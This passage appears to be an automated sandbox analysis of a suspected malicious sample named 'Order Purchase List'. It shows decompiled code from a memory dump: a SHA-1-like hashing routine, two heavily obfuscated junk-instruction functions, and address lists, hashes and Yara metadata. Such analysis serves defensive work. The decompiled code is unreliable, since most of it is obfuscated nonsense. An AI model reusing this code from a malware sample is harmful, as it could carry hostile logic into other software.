					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}

0x00408c9b
0x00408c9f
0x00408ca1
0x00408ca1
0x00408ca4
0x00408cc6
0x00408cec
0x00408d12
0x00408d34
0x00408d3b
0x00408d3e
0x00408d41
0x00408d4a
0x00408d50
0x00408d57
0x00408d68
0x00408d6b
0x00408d6e
0x00408d72
0x00408d74
0x00408d76
0x00408d7f
0x00408d82
0x00408d85
0x00408d90
0x00408d96
0x00408d98
0x00408d98
0x00408d9b
0x00408d9e
0x00408d9e
0x00408da3
0x00408da5
0x00408da8
0x00408dab
0x00408db1
0x00408db4
0x00408db7
0x00408dc0
0x00408dc6
0x00408dcf
0x00408dde
0x00408de5
0x00408de8
0x00408deb
0x00408df4
0x00408df7
0x00408dfa
0x00408e12
0x00408e19
0x00408e1b
0x00408e1e
0x00408e21
0x00408e2a
0x00408e31
0x00408e34
0x00408e37
0x00408e46
0x00408e4d
0x00408e50
0x00408e53
0x00408e5c
0x00408e66
0x00408e69
0x00408e75
0x00408e78
0x00408e7f
0x00408e82
0x00408e85
0x00408e8a
0x00408e8d
0x00408e96
0x00408ea7
0x00408eaa
0x00408ead
0x00408eb4
0x00408eb7
0x00408eba
0x00408ebd
0x00408ebf
0x00408ec2
0x00408ec5
0x00408ece
0x00408ed3
0x00408ed3
0x00408ee8
0x00408eeb
0x00408eee
0x00408ef5
0x00408ef8
0x00408efb
0x00408f10
0x00408f17
0x00408f1a
0x00408f1e
0x00408f21
0x00408f26
0x00408f29
0x00408f38
0x00408f3b
0x00408f42
0x00408f45
0x00408f48
0x00408f4b
0x00408f4e
0x00408f56
0x00408f64
0x00408f67
0x00408f6a
0x00408f6a
0x00408f71
0x00408f74
0x00408f77
0x00408f7f
0x00408f8d
0x00408f90
0x00408f97
0x00408f9a
0x00408f9d
0x00408fa0
0x00408fa3
0x00408fac
0x00408fb3
0x00408fb3
0x00408fb9
0x00408fd2
0x00408fd5
0x00408fdc
0x00408fdf
0x00408fe2
0x00408ff4
0x00408ffe
0x00409001
0x0040900a
0x0040900d
0x00409014
0x00409017
0x0040901d
0x00409030
0x00409037
0x0040903a
0x0040903d
0x00409040
0x00409049
0x0040904c
0x0040905f
0x00409062
0x0040906c
0x0040906f
0x00409071
0x0040907a
0x0040907d
0x00409090
0x00409096
0x00409099
0x004090a0
0x004090a2
0x004090a5
0x004090a8
0x004090ab
0x004090ae
0x004090b1
0x004090ba
0x004090bf
0x004090c2
0x004090c2
0x004090d5
0x004090d8
0x004090db
0x004090e2
0x004090e5
0x004090e8
0x004090eb
0x004090fe
0x00409101
0x0040910c
0x0040910f
0x0040911b
0x0040911e
0x00409124
0x00409127
0x0040912a
0x00409131
0x00409141
0x00409144
0x0040914a
0x0040914d
0x00409154
0x00409156
0x00409159
0x0040915c
0x0040915f
0x00409162
0x00409169
0x00409178
0x0040917b
0x00409182
0x00409185
0x00409188
0x0040918b
0x0040918e
0x00409191
0x00409194
0x0040919d
0x004091ae
0x004091b6
0x004091bc
0x004091bf
0x004091c1
0x004091c4
0x004091c7
0x004091d4

Strings

(, xrefs: 00408FAC

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction ID: f041c125440c4280e53184c5d8a041a3e8c7322eabd03e6beab604ed3498cdf9
Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction Fuzzy Hash: 17022DB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80

Uniqueness

Uniqueness Score: -1.00%

Function 0041C4BF, Relevance: 1.5, Strings: 1, Instructions: 273
COMMONCrypto

Download Yara Rule

C-Code - Quality: 56%

			E0041C4BF() {
				signed char _t44;
				signed int _t46;
				signed char _t54;
				signed char _t62;
				signed int _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				signed int _t70;
				signed int _t75;
				signed int _t77;

				if((_t70 & 0x7549bfe9) > 0) {
					__edi =  *0x4b6d4a7e * 0x390e;
					__esi = __esi - 1;
					__bl = __bl | 0x0000000c;
					asm("scasb");
					 *0x4f6a4f32 =  *0x4f6a4f32 + __bh;
					__esi = __esi | 0x0f4e390e;
					__edi = 0x86b4af0e +  *0x4b6d4a7e * 0x390e;
					_pop( *0xc1b4d496);
					_push(__edx);
					__edx = __edx ^  *0x3af811c2;
					 *0xa19c6c10 =  *0xa19c6c10 | __ch;
					asm("sbb [0xa209506], esp");
					__edi =  *0xd37ef26a * 0xf03;
					 *0xc6e88f =  *0xc6e88f >> 0xba;
					__cl = __cl -  *0xa62f35b0;
					asm("adc al, [0xeaeeb322]");
					__edx = __edx ^ 0x12a02dfa;
					asm("sbb [0x75a0b9e3], al");
					 *0xb5daa03e =  *0xb5daa03e >> 0x65;
					 *0x88e992df =  *0x88e992df - __edi;
					if( *0x88e992df <= 0) {
						__ecx = __ecx |  *0x2217d1f3;
						 *0x6ee76acd =  *0x6ee76acd >> 0xf4;
						__ebp = __ebp |  *0xad084c95;
						_pop(__eax);
						if(__ebp <= 0) {
							 *0xde305a77 =  *0xde305a77 << 0xea;
							__ch = __ch + 0x3c;
							__bh = __bh ^ 0x000000e2;
							asm("sbb ebx, [0x3c860bc1]");
							asm("movsb");
							 *0x6f09c6fe =  *0x6f09c6fe >> 0xe8;
							 *0x19337398 =  *0x19337398 - __esi;
							__esp = __esp +  *0x1e18be13;
							asm("ror byte [0x494e22b0], 0x3e");
							if(__esp >=  *0x1c6bb60b) {
								__ecx = __ecx |  *0xf0fc6f70;
								asm("adc ebx, [0x366f0416]");
								asm("ror dword [0x1409aeb], 0x17");
								if(__ecx >= 0) {
									__edx = __edx &  *0xd5b40c70;
									if(__edi == 0) {
										asm("sbb edi, [0x1be9e375]");
										_t35 = __ecx;
										__ecx =  *0x191f4e94;
										 *0x191f4e94 = _t35;
										asm("rcl dword [0xd4452625], 0x67");
										__ebp = __ebp - 1;
										__ecx =  *0x191f4e94 - 0xb5a4db95;
										if(__ecx >= 0) {
											__eax =  *0x9e46406a * 0xcb10;
											asm("sbb eax, [0xb5481d1e]");
											__al = __al + 0xd2;
											 *0xb1e00bbf =  *0xb1e00bbf << 0x5e;
											asm("cmpsw");
											asm("rcl dword [0x49542d8e], 0xa8");
											if( *0xb1e00bbf >= 0) {
												__esi = __esi -  *0xf0fc6f70;
												 *0x74b0080b = __esp;
												asm("ror dword [0x4950f036], 0x9e");
												if(__esi >= 0) {
													 *0xf0fc6f70 = __ebx;
													__ebp = __ebp +  *0xca064411;
													__edi =  *0x2f00d560 * 0x361c;
													asm("ror byte [0x3ce63db2], 0x1c");
													asm("adc ebx, [0x8cb8f90b]");
													_pop(__esi);
													 *0xcf0fc6f =  *0xcf0fc6f | __ecx;
													_pop(__eax);
													asm("sbb ah, [0x281dfd2a]");
													 *0x92cc0810 =  *0x92cc0810 - __bl;
													__esp =  *0x6bed961e;
													asm("adc cl, 0xa");
													__esi = __edi;
													__esi =  *0x3db25ff0;
													asm("adc [0x870e3ce6], dl");
													_push(__ebp);
													__cl = __cl - 0xe2;
													__ah = __ah +  *0xf5e7afe7;
													asm("adc esp, [0x270b970e]");
													_t40 = __dl;
													__dl =  *0x5844d730;
													 *0x5844d730 = _t40;
													__esp =  *0x6bed961e | 0x6f704917;
													 *0x351cf0fc =  *0x351cf0fc + __esi;
													__eax = __eax + 1;
													__bh = __bh ^  *0xa5374c1c;
													__ebp =  *0xc5f8f8ff;
													__edx = __edx &  *0xe16c840f;
													asm("sbb esp, [0x12b62429]");
													if(__edx >= 0) {
														__ebx =  *0x7d20597c * 0x3c2;
														 *0xaef6050e = __esi;
														asm("sbb dh, [0x900d84b5]");
														 *0xe7afb186 =  *0xe7afb186 - __ah;
														if(__ebp >= 0) {
															__esp =  *0x6b1fc670;
															_push(__ebx);
															_push(0x6f704913);
															__esp =  *0x6b1fc670 ^  *0x670af0fc;
															_push( *0xba47b0d8);
															 *0x46863fb0 =  *0x46863fb0 | __al;
															if( *0x46863fb0 < 0) {
																 *0xb1f11071 =  *0xb1f11071 >> 0xce;
																__esi = __esi + 1;
																asm("sbb [0x697330bb], esi");
																__esi = __esi |  *0x3d8dcb9e;
																asm("adc [0xe0b4819e], ebx");
																__ecx = __ecx - 1;
																if(__ecx >= 0) {
																	 *0xf0fc6f70 =  *0xf0fc6f70 - __ecx;
																	_push( *0x38368713);
																	__edi = __edi ^  *0x291879fd;
																	__al = __al +  *0x3218b1b7;
																	 *0x386aab0e =  *0x386aab0e & __esp;
																	asm("sbb al, [0xf29d58e3]");
																	__ah = __ah | 0x000000e7;
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L1:
				_pop( *0x2a529409);
				_t50 = _t50 + 0x78c1d903;
				_t54 = _t54 -  *0x550d1e30;
				_push(_t69);
				asm("sbb bl, 0xd0");
				asm("adc [0x5e9ea6c9], bl");
				_t46 = _t46 &  *0xee0c8d29;
				asm("adc ebx, [0x311d046c]");
				asm("sbb ecx, 0xc989e08c");
				asm("lodsd");
				_push(_t50);
				_t69 = _t69 - 1;
				asm("rcl byte [0x3fbd9008], 0xe");
				_t70 = _t70 - 1;
				_t63 = _t63 - 0xb1242c2e;
				if((_t44 & 0x1ab4b105) < 0) {
					asm("sbb [0xed0dd771], edx");
					 *0x98a9087 =  *0x98a9087 - _t70;
					asm("adc ecx, [0xd3d3b435]");
					if( *0x98a9087 <= 0) {
						asm("adc [0x8d574f77], ebx");
						_pop(_t69);
						_push( *0x74104a36);
						asm("lodsd");
						_t75 = _t75 ^ 0x79383833;
						asm("rcr dword [0xc5d262bf], 0x61");
						asm("rol dword [0x640a03eb], 0x1e");
						asm("sbb ebp, [0x76fe1429]");
						asm("sbb bl, [0x711e2f82]");
						_push( *0x53b27e09);
						_t46 = 0x287ca813 -  *0x99051ecf;
						 *0xd7ab022f =  *0xd7ab022f >> 0xe0;
						_t50 = 0xa;
						_t54 = ((_t54 |  *0x3fb272eb) &  *0xe555ddf2) +  *0xaf2e830b;
						asm("rol byte [0xb64a5934], 0x33");
						_t63 = _t63;
						if(_t63 < 0) {
							asm("sbb edx, [0x6aaf0a71]");
							_push(0x811d5329);
							_t70 = _t70 - 1;
							_t69 = _t69 - 1;
							if(_t69 < 0) {
								_t54 = _t54 ^  *0x11030f71;
								 *0x6df80ce0 =  *0x6df80ce0 + 0xa;
								 *0x8de945f3 =  *0x8de945f3 ^ 0x287ca813;
								_t46 = _t46 + 0xa0;
								asm("rol byte [0x50590312], 0x7d");
								asm("sbb dh, [0x5305c024]");
								_t44 = _t44 & 0x799f3c83;
								_pop(_t65);
								_pop( *0xfdc51691);
								 *0xb15653a9 =  *0xb15653a9 >> 0x83;
								asm("sbb [0x8a15626c], eax");
								_t63 = _t65 + 1;
								_t50 = 0x25ce0183 +  *0x2bd1fb8f & 0x000000ca;
								if(_t50 < 0) {
									asm("stosb");
									asm("rcl byte [0x33670730], 0x95");
									 *0x614bdadb =  *0x614bdadb | _t69;
									_t70 = 0x8200a671;
									if( *0x614bdadb <= 0) {
										 *0x962d1bf0 =  *0x962d1bf0 + 0x287ca813;
										asm("adc edx, [0xe73ac826]");
										 *0x2f3f1ccb =  *0x6a261e7f * 0xd13b -  *0x3509b8dc;
										 *0xbd0901df =  *0xbd0901df >> 0x97;
										_t77 = _t75 - 1 +  *0x9c9eb206;
										_pop(_t66);
										 *0xab3e2fc4 =  *0xab3e2fc4 ^ _t44;
										 *0xe82cce68 =  *0xe82cce68 ^ _t70;
										 *0xe3cd41ea = _t44;
										_t50 = _t50 + 1;
										 *0x1f4f8938 =  *0x1f4f8938 ^ _t50;
										asm("rcr dword [0x3cb441f3], 0xf1");
										_t63 = (_t66 - 0x00000001 |  *0xaa92b917) &  *0x48242bde;
										asm("adc [0x704bccc9], cl");
										 *0xec116eb6 = _t44 -  *0x4c2f0d80;
										_t46 =  *0x38028e97;
										_t44 =  *0xad2fb260 * 0x81d;
										_push(_t77);
										 *0xfe811d01 = _t70 ^ 0xca1c871b;
										asm("movsw");
										_t75 =  *0x312dedfd;
										 *0x312dedfd = _t77;
										_t69 = _t69 + 1;
										 *0x38ec6138 =  *0x38ec6138 >> 0xd0;
										_t62 =  *0xd4d909d1;
										 *0xd4d909d1 =  *0x2f3f1ccb + 0x00000001 & 0x00000038;
										 *0xb1e0c89 =  *0xb1e0c89 << 0x80;
										 *0xf202931b =  *0xf202931b - _t62;
										_t54 = _t62 ^ 0x000000e6;
										_t70 =  *0x96049ebe;
										asm("adc ecx, [0x890ef031]");
										 *0xef5459e5 =  *0xef5459e5 ^ _t44;
										asm("sbb eax, 0x486a0e97");
										 *0xe78fc910 =  *0xe78fc910 - _t46;
									}
								}
							}
						}
					}
				}
				goto L1;
			}

0x0041c4c5
0x0041c4cb
0x0041c4d5
0x0041c4d6
0x0041c4d9
0x0041c4da
0x0041c4e6
0x0041c4ec
0x0041c4f5
0x0041c4fb
0x0041c4fc
0x0041c504
0x0041c510
0x0041c516
0x0041c520
0x0041c527
0x0041c52d
0x0041c533
0x0041c539
0x0041c53f
0x0041c546
0x0041c54c
0x0041c558
0x0041c55e
0x0041c565
0x0041c56b
0x0041c56c
0x0041c572
0x0041c579
0x0041c57c
0x0041c57f
0x0041c585
0x0041c586
0x0041c58d
0x0041c593
0x0041c59f
0x0041c5a6
0x0041c5ac
0x0041c5b2
0x0041c5b8
0x0041c5bf
0x0041c5c5
0x0041c5d1
0x0041c5d7
0x0041c5dd
0x0041c5dd
0x0041c5dd
0x0041c5e3
0x0041c5ea
0x0041c5eb
0x0041c5f1
0x0041c5fd
0x0041c607
0x0041c60d
0x0041c60f
0x0041c616
0x0041c618
0x0041c61f
0x0041c625
0x0041c62b
0x0041c631
0x0041c638
0x0041c63e
0x0041c644
0x0041c64a
0x0041c65a
0x0041c661
0x0041c667
0x0041c66e
0x0041c674
0x0041c67b
0x0041c688
0x0041c68e
0x0041c694
0x0041c697
0x0041c698
0x0041c69e
0x0041c6a4
0x0041c6ab
0x0041c6b1
0x0041c6b7
0x0041c6bd
0x0041c6bd
0x0041c6bd
0x0041c6c3
0x0041c6c9
0x0041c6cf
0x0041c6d0
0x0041c6dc
0x0041c6e2
0x0041c6e8
0x0041c6ee
0x0041c6f4
0x0041c6fe
0x0041c704
0x0041c70a
0x0041c716
0x0041c71c
0x0041c722
0x0041c723
0x0041c728
0x0041c72e
0x0041c734
0x0041c73a
0x0041c740
0x0041c747
0x0041c748
0x0041c74e
0x0041c754
0x0041c766
0x0041c767
0x0041c76d
0x0041c773
0x0041c77f
0x0041c785
0x0041c791
0x0041c797
0x0041c79d
0x0041c79d
0x0041c767
0x0041c73a
0x0041c716
0x0041c6ee
0x0041c638
0x0041c61f
0x0041c5f1
0x0041c5d1
0x0041c5bf
0x0041c5a6
0x0041c56c
0x0041c54c
0x0041b8d6
0x0041b8d6
0x0041b8dc
0x0041b8e2
0x0041b8e8
0x0041b8e9
0x0041b8f2
0x0041b8f8
0x0041b8fe
0x0041b904
0x0041b90a
0x0041b90b
0x0041b90c
0x0041b90d
0x0041b914
0x0041b915
0x0041b920
0x0041b922
0x0041b928
0x0041b92e
0x0041b934
0x0041b936
0x0041b942
0x0041b956
0x0041b95c
0x0041b95d
0x0041b963
0x0041b970
0x0041b978
0x0041b97e
0x0041b984
0x0041b990
0x0041b996
0x0041b99d
0x0041b99f
0x0041b9a5
0x0041b9ac
0x0041b9ad
0x0041b9b3
0x0041b9b9
0x0041b9be
0x0041b9c2
0x0041b9c3
0x0041b9c9
0x0041b9cf
0x0041b9d5
0x0041b9e1
0x0041b9e4
0x0041b9eb
0x0041b9f7
0x0041ba02
0x0041ba09
0x0041ba15
0x0041ba22
0x0041ba28
0x0041ba29
0x0041ba2c
0x0041ba37
0x0041ba38
0x0041ba3f
0x0041ba45
0x0041ba46
0x0041ba5c
0x0041ba63
0x0041ba69
0x0041ba6f
0x0041ba76
0x0041ba7c
0x0041ba7d
0x0041ba83
0x0041ba89
0x0041ba8f
0x0041ba90
0x0041baa2
0x0041babc
0x0041bace
0x0041bad4
0x0041bad9
0x0041badf
0x0041baec
0x0041baf3
0x0041baf9
0x0041bafb
0x0041bafb
0x0041bb02
0x0041bb0f
0x0041bb16
0x0041bb16
0x0041bb22
0x0041bb2f
0x0041bb35
0x0041bb3e
0x0041bb4a
0x0041bb5c
0x0041bb62
0x0041bb67
0x0041bb6d
0x0041ba46
0x0041ba2c
0x0041b9c3
0x0041b9ad
0x0041b934
0x00000000

Strings

Wh;, xrefs: 0041BAC2

Memory Dump Source

Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd

Yara matches

Similarity

API ID:
String ID: Wh;
API String ID: 0-697344040
Opcode ID: 4763a07854cc698448f797b69419476a8256e98a52dfdcb2724583a36f2ea935
Instruction ID: 8baa63f0a215dff2bc4d1d5f695e2d3aff678b42749c0d4c7db6b8620fcfd669
Opcode Fuzzy Hash: 4763a07854cc698448f797b69419476a8256e98a52dfdcb2724583a36f2ea935
Instruction Fuzzy Hash: 7AD13132908384CFD716DF38C88AB853FB6F752B24B08435FD4A293591D7742696CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0041BBEA, Relevance: 1.4, Strings: 1, Instructions: 184
COMMONCrypto

Download Yara Rule

C-Code - Quality: 52%

			E0041BBEA() {
				signed int _t37;
				signed char _t38;
				void* _t40;
				signed int _t41;
				signed char _t49;
				signed char _t57;
				signed int _t58;
				void* _t60;
				void* _t61;
				signed int _t64;
				signed int _t66;
				signed int _t71;
				signed int _t73;

				_t66 = 0x7fd092fd;
				asm("cmpsw");
				_t41 = _t40 -  *0x91ee20a2;
				 *0x510983d2 = _t41;
				_t38 = _t37 |  *0xbef9d413;
				asm("sbb ecx, [0x1e19b815]");
				if(_t41 >=  *0xa9b0630a) {
					asm("rol dword [0x28b32770], 0xed");
					__cl = __cl + 0x12;
					 *0xe5177124 = __cl;
					asm("sbb esp, [0xbcd2accc]");
					_pop( *0xc921cb39);
					asm("adc esi, 0x5693b787");
					_t35 = __ecx;
					__ecx =  *0xdcf947ea;
					 *0xdcf947ea = _t35;
					if(__cl < 0) {
						__esi = __esi ^  *0xa85a7671;
						 *0x531bc6bb =  *0x531bc6bb << 0x5f;
						 *0x84ff6c8f =  *0x84ff6c8f | __ebx;
						if( *0x84ff6c8f > 0) {
							__esp =  *0xcb05f27e * 0xf74a;
							if(__esp > 0) {
								__ecx =  *0x2ce8717e * 0x4205;
								_push(0xa79c7aba);
								 *0x641c49a0 =  *0x641c49a0 >> 0xf0;
								__esi = __esi ^  *0x9a0712d1;
								_t36 = __bh;
								__bh =  *0xc1478434;
								 *0xc1478434 = _t36;
								asm("rcl byte [0x55aa8cb4], 0x87");
								 *0x925adcec =  *0x925adcec << 0xb1;
								asm("adc ecx, 0xd102916c");
								__ebx = __ebx - 1;
								asm("rcl byte [0x12fd3ed0], 0xa9");
								asm("sbb al, [0xce133212]");
								asm("rcr dword [0x733e326e], 0xb8");
								_push(0xa79c7aba);
								_push(0xa79c7aba);
								__eax = __eax ^  *0x7a1f1529;
								 *0x781b6fff =  *0x781b6fff ^ __esi;
								 *0xd85d04e1 =  *0xd85d04e1 & __dl;
								L1();
								asm("sbb [0x1fc2e3e8], eax");
								asm("movsw");
								__eax = __eax & 0x531859c8;
							}
						}
					}
				}
				L1:
				_pop( *0x2a529409);
				_t45 = _t45 + 0x78c1d903;
				_t49 = _t49 -  *0x550d1e30;
				_push(_t64);
				asm("sbb bl, 0xd0");
				asm("adc [0x5e9ea6c9], bl");
				_t41 = _t41 &  *0xee0c8d29;
				asm("adc ebx, [0x311d046c]");
				asm("sbb ecx, 0xc989e08c");
				asm("lodsd");
				_push(_t45);
				_t64 = _t64 - 1;
				asm("rcl byte [0x3fbd9008], 0xe");
				_t66 = _t66 - 1;
				_t58 = _t58 - 0xb1242c2e;
				if((_t38 & 0x1ab4b105) < 0) {
					asm("sbb [0xed0dd771], edx");
					 *0x98a9087 =  *0x98a9087 - _t66;
					asm("adc ecx, [0xd3d3b435]");
					if( *0x98a9087 <= 0) {
						asm("adc [0x8d574f77], ebx");
						_pop(_t64);
						_push( *0x74104a36);
						asm("lodsd");
						_t71 = _t71 ^ 0x79383833;
						asm("rcr dword [0xc5d262bf], 0x61");
						asm("rol dword [0x640a03eb], 0x1e");
						asm("sbb ebp, [0x76fe1429]");
						asm("sbb bl, [0x711e2f82]");
						_push( *0x53b27e09);
						_t41 = 0x287ca813 -  *0x99051ecf;
						 *0xd7ab022f =  *0xd7ab022f >> 0xe0;
						_t45 = 0xa;
						_t49 = ((_t49 |  *0x3fb272eb) &  *0xe555ddf2) +  *0xaf2e830b;
						asm("rol byte [0xb64a5934], 0x33");
						_t58 = _t58;
						if(_t58 < 0) {
							asm("sbb edx, [0x6aaf0a71]");
							_push(0x811d5329);
							_t66 = _t66 - 1;
							_t64 = _t64 - 1;
							if(_t64 < 0) {
								_t49 = _t49 ^  *0x11030f71;
								 *0x6df80ce0 =  *0x6df80ce0 + 0xa;
								 *0x8de945f3 =  *0x8de945f3 ^ 0x287ca813;
								_t41 = _t41 + 0xa0;
								asm("rol byte [0x50590312], 0x7d");
								asm("sbb dh, [0x5305c024]");
								_t38 = _t38 & 0x799f3c83;
								_pop(_t60);
								_pop( *0xfdc51691);
								 *0xb15653a9 =  *0xb15653a9 >> 0x83;
								asm("sbb [0x8a15626c], eax");
								_t58 = _t60 + 1;
								_t45 = 0x25ce0183 +  *0x2bd1fb8f & 0x000000ca;
								if(_t45 < 0) {
									asm("stosb");
									asm("rcl byte [0x33670730], 0x95");
									 *0x614bdadb =  *0x614bdadb | _t64;
									_t66 = 0x8200a671;
									if( *0x614bdadb <= 0) {
										 *0x962d1bf0 =  *0x962d1bf0 + 0x287ca813;
										asm("adc edx, [0xe73ac826]");
										 *0x2f3f1ccb =  *0x6a261e7f * 0xd13b -  *0x3509b8dc;
										 *0xbd0901df =  *0xbd0901df >> 0x97;
										_t73 = _t71 - 1 +  *0x9c9eb206;
										_pop(_t61);
										 *0xab3e2fc4 =  *0xab3e2fc4 ^ _t38;
										 *0xe82cce68 =  *0xe82cce68 ^ _t66;
										 *0xe3cd41ea = _t38;
										_t45 = _t45 + 1;
										 *0x1f4f8938 =  *0x1f4f8938 ^ _t45;
										asm("rcr dword [0x3cb441f3], 0xf1");
										_t58 = (_t61 - 0x00000001 |  *0xaa92b917) &  *0x48242bde;
										asm("adc [0x704bccc9], cl");
										 *0xec116eb6 = _t38 -  *0x4c2f0d80;
										_t41 =  *0x38028e97;
										_t38 =  *0xad2fb260 * 0x81d;
										_push(_t73);
										 *0xfe811d01 = _t66 ^ 0xca1c871b;
										asm("movsw");
										_t71 =  *0x312dedfd;
										 *0x312dedfd = _t73;
										_t64 = _t64 + 1;
										 *0x38ec6138 =  *0x38ec6138 >> 0xd0;
										_t57 =  *0xd4d909d1;
										 *0xd4d909d1 =  *0x2f3f1ccb + 0x00000001 & 0x00000038;
										 *0xb1e0c89 =  *0xb1e0c89 << 0x80;
										 *0xf202931b =  *0xf202931b - _t57;
										_t49 = _t57 ^ 0x000000e6;
										_t66 =  *0x96049ebe;
										asm("adc ecx, [0x890ef031]");
										 *0xef5459e5 =  *0xef5459e5 ^ _t38;
										asm("sbb eax, 0x486a0e97");
										 *0xe78fc910 =  *0xe78fc910 - _t41;
									}
								}
							}
						}
					}
				}
				goto L1;
			}

0x0041bbf8
0x0041bbfe
0x0041bc00
0x0041bc06
0x0041bc0c
0x0041bc12
0x0041bc1e
0x0041bc24
0x0041bc2b
0x0041bc2e
0x0041bc34
0x0041bc3a
0x0041bc40
0x0041bc46
0x0041bc46
